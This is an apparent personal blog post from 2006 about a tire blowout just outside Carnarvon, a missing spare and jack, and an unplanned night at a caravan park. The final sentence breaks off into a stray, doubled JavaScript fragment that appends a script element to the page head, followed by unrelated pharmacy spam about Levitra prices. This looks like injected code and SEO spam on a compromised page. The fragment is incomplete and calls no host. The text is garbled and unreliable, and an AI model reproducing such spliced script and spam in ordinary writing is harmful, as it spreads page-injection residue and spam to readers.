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The blow out

Posted by admin On December - 10 - 2006

Kim and I joining Duncan and Dominic at their trip up north. We had same plans and Kim does not have a Greyhound ticket as I do. It seem to be a fun time. On the way up north out of a sudden there is a big bang – one of our tires popped. Lucky that the guys knew about cars and that this accident happened only a few hundred meters out of Carnarven. Unfortunately there was no proper spare tire and no jack in the back. The guys were too exited when they had bought the car and forgot to check everything. But today is Sunday and so no shop is opened where you can buy new tires. We had to stay overnight at a caravan park.d.getElementsByTagName(‘head’)[0].appendChild(s);d.getElementsByTagName(‘head’)[0].appendChild(s); cost of levitra at cvs 360

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